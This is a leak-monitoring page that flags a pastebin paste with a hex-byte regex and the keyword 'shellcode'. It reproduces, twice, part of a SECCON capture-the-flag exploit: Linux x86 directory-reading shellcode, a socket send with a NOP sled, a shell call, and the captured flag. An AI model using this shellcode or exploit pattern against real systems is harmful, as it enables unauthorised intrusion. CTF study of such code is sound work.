LeakedIn Logo
Stories About Data Leaks and Related Stuff

Potential leak of data: Shellcode

0 votedvote

Detected 11 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:

txt\x00"

# linux/x86/read-dir(STDOUT)
#shellcode = "\xEB\x38\x5B\x31\xC9\x31\xD2\x6A\x05\x58\xCD\x80\x93\x91\xB2\x7F\xB0\x59\x60\xCD\x80\x85\xC0\x74\x26\xB3\x01\x66\x0F\xB6\x51\x08\x8D\x4C\x19\x09\xB0\x04\xCD\x80\xB2\x01\x8D\x4A\x09\x51\x89\xE5\x55\x59\xB0\x04\xCD\x80\x58\x61\xEB\xD8\xE8\xC3\xFF\xFF\xFF"+"/home/stage16\x00"

s.sendall("\x90"*3+shellcode)
shell(s)

"""
# py exp.py r
SECCON{2QpaleoLev}
*** Connection closed by remote host ***
"""

Detected 4 occurrence(s) of ‘shellcode’:

\xCD\x80\x93\x91\xB2\x7F\xB0\x59\x60\xCD\x80\x85\xC0\x74\x26\xB3\x01\x66\x0F\xB6\x51\x08\x8D\x4C\x19\x09\xB0\x04\xCD\x80\xB2\x01\x8D\x4A\x09\x51\x89\xE5\x55\x59\xB0\x04\xCD\x80\x58\x61\xEB\xD8\xE8\xC3\xFF\xFF\xFF"+"/home/stage16\x00"

s.sendall("\x90"*3+shellcode)
shell(s)

"""
# py exp.py r
SECCON{2QpaleoLev}
*** Connection closed by remote host ***
"""

Source: http://pastebin.com/raw.php?i=Fau8A3La

Tags: ,

Comments are closed.